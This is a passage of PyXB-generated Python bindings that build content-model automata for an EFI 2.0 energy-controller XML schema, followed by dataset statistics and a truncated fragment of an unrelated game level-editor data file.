import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_32._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOptions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 312, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_32._Automaton = _BuildAutomaton_74()
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours'), ActuatorBehaviours, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6)))
CTD_ANON_33._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour'), LeakageFunction, scope=CTD_ANON_33, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6)))
def _BuildAutomaton_75 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_75
del _BuildAutomaton_75
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviours')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 685, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_33._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'leakageBehaviour')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 686, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_33._Automaton = _BuildAutomaton_75()
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel'), pyxb.binding.datatypes.double, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6)))
CTD_ANON_34._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses'), ActuatorStatuses, scope=CTD_ANON_34, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6)))
def _BuildAutomaton_76 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_76
del _BuildAutomaton_76
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currentFillLevel')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 735, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_34._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatuses')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 736, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_34._Automaton = _BuildAutomaton_76()
CTD_ANON_35._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetProfile'), TargetProfile, scope=CTD_ANON_35, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 758, 6)))
def _BuildAutomaton_77 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_77
del _BuildAutomaton_77
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_35._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 758, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_35._Automaton = _BuildAutomaton_77()
CTD_ANON_36._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'usageForecast'), CTD_ANON_11, scope=CTD_ANON_36, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 769, 6)))
def _BuildAutomaton_78 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_78
del _BuildAutomaton_78
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_36._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'usageForecast')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 769, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_36._Automaton = _BuildAutomaton_78()
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), AdjustableRunningModes, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6)))
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timers'), Timers, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6)))
CTD_ANON_37._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitions'), Transitions, scope=CTD_ANON_37, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6)))
def _BuildAutomaton_79 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_79
del _BuildAutomaton_79
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6))
counters.add(cc_0)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModes')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 883, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timers')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 884, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_37._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitions')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 885, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_37._Automaton = _BuildAutomaton_79()
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'currentRunningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 901, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), STD_ANON_2, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), pyxb.binding.datatypes.int, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6)))
CTD_ANON_38._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), TimerUpdates, scope=CTD_ANON_38, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 912, 6)))
def _BuildAutomaton_80 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_80
del _BuildAutomaton_80
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6))
counters.add(cc_2)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'flexibilityUpdateId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 57, 5))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'validFrom')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 58, 5))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'currentRunningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 901, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 902, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 910, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 911, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_38._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 912, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
st_7._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_38._Automaton = _BuildAutomaton_80()
| 60.031317
| 414
| 0.775798
| 55,450
| 502,222
| 6.797151
| 0.019946
| 0.028689
| 0.037018
| 0.055335
| 0.874705
| 0.862272
| 0.832699
| 0.826302
| 0.795236
| 0.784435
| 0
| 0.021829
| 0.111192
| 502,222
| 8,365
| 415
| 60.038494
| 0.822525
| 0.131758
| 0
| 0.663902
| 1
| 0
| 0.200804
| 0.171155
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014342
| false
| 0
| 0.015725
| 0
| 0.256437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c6499f819501950939bd7e70ddf612cbf8b95613
| 189,635
|
py
|
Python
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/GABES_ravensCoveIsland.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Adj Table': {'1271349069.91akelts': [],'1271349163.04akelts': [],'1271349193.8akelts': [],'1271349238.13akelts': [],'1271349357.21akelts': [],'1271349715.76akelts': [],'1271349813.4akelts': ['1271349871.68akelts'],'1271349871.68akelts': ['1271349813.4akelts', '1271349883.93akelts', '1271349925.8akelts'],'1271349883.93akelts': ['1271349871.68akelts'],'1271349925.8akelts': ['1271349871.68akelts', '1271349357.21akelts', '1271349968.82akelts'],'1271349968.82akelts': ['1271349925.8akelts']},'Objects': {'1271348547.01akelts': {'Type': 'Island','Name': 'default','File': '','Environment': 'OpenSky','Minimap': False,'Objects': {'1271350320.82akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'GridPos': Point3(442.667, -255.554, 2.999),'Holiday': '','Hpr': VBase3(64.234, 0.0, 0.0),'Pos': Point3(462.672, -203.981, 7.729),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1271353150.08akelts': {'Type': 'Tunnel Cap','DisableCollision': False,'Holiday': '','Hpr': VBase3(88.894, 0.0, 0.0),'Objects': {},'Pos': Point3(398.717, -290.775, 168.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.76, 0.856, 1.0, 1.0),'Model': 'models/tunnels/pir_m_are_tun_caveInterior_cap'}},'1271353336.94akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353336.94akelts0','Holiday': '','Hpr': VBase3(-126.854, 8.437, 3.826),'Objects': {'1271353336.96akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-0.179, -3.997, 4.89),'Scale': VBase3(1.0, 1.0, 1.0),'TargetUIDs': []}},'Pos': Point3(-230.347, 417.644, 49.202),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseH_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1271353423.55akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353423.55akelts0','Holiday': '','Hpr': VBase3(-0.537, 0.393, 1.779),'Objects': {'1271353423.62akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(-0.819, -13.822, 1.347),'Scale': VBase3(1.0, 1.0, 1.0)},'1271975061.45akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(6.788, 21.065, 0.984),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-365.733, 225.844, 62.643),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/pir_m_bld_shn_houseA_destroyed','SignFrame': '','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1271353470.51akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1271353470.51akelts0','Holiday': '','Hpr': VBase3(-130.621, 1.379, 0.0),'Objects': {'1271353470.54akelts': {'Type': 'Door Locator Node','Name': 'door_locator','GridPos': Point3(-318.159, -296.321, 124.999),'Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(12.899, -22.494, 0.283),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-80.636, -225.232, 109.702),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 